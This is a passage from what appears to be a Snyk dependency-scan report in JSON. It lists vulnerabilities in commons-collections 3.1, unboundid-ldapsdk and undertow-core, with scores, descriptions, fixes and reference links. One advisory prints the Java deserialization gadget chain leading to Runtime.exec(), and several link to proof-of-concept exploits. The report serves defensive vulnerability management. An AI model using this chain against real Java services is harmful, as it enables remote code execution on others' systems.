"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": 
"Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + 
"commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + 
"assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## 
Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. 
Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": 
"commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": 
"critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + 
"commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMUNBOUNDID-32143", + "title": "User Impersonation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,4.0.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.0.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[,4.0.5)" + ], + "functionId": { + "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java", + "className": "SimpleBindRequest", + "functionName": "process" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.unboundid:unboundid-ldapsdk", + "references": [ + { + "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6", + "title": "GitHub Commit" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134", + "title": "NVD" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:19.854962Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7, + "modificationTime": "2024-03-11T09:49:40.956024Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:05.592817Z" + 
}, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:19.854962Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:40.956024Z" + } + ], + "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)", + "epssDetails": { + "percentile": "0.80907", + "probability": "0.00729", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000134" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "com.unboundid:unboundid-ldapsdk", + "proprietary": false, + "creationTime": "2018-03-16T00:00:00Z", + "functions_new": [ + { + "version": [ + "[,4.0.5)" + ], + "functionId": { + "className": "com.unboundid.ldap.sdk.SimpleBindRequest", + "functionName": "process" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-03-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", 
+ "mavenModuleName": { + "groupId": "com.unboundid", + "artifactId": "unboundid-ldapsdk" + }, + "publicationTime": "2018-04-01T14:18:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:40.956024Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "com.unboundid:unboundid-ldapsdk@3.1.1" + ], + "upgradePath": [ + false, + "com.unboundid:unboundid-ldapsdk@4.0.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.unboundid:unboundid-ldapsdk", + "version": "3.1.1" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-2391283", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.2.15.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.15.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8", + "title": "Github Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2010378", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:50.428787Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:48.070223Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-06T13:57:10.356697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:50.428787Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.070223Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) which would cause client side invocation timeout with certain calls made over HTTP2.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.15.Final or higher.\n## References\n- [Github Commit](https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2010378)\n", + "epssDetails": { + "percentile": "0.78402", + "probability": "0.00590", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-3859" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2022-02-02T11:20:49.957629Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-02-01T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2022-02-09T17:20:22.376852Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.070223Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.15.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-2871356", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + 
